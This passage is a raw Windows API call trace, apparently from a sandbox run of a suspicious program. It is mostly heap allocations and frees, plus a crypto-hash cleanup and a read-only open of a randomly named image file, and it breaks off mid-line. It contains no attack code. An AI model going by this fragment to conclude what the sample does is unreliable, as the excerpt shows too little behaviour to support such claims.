[0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caad8 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0094.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0094.508] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0094.508] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0094.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0094.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f08 [0094.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0094.509] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0094.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0094.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0094.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0094.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0094.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0094.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0094.512] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0094.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0094.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0094.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0094.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0094.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0094.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0094.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0094.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0094.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0094.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0094.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0094.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0094.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0094.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\maajsjcxjkdulec2t.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0094.516] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.516] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0094.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0094.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0094.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.516] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0094.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.517] HeapFree (in: hHeap=0x1780000, 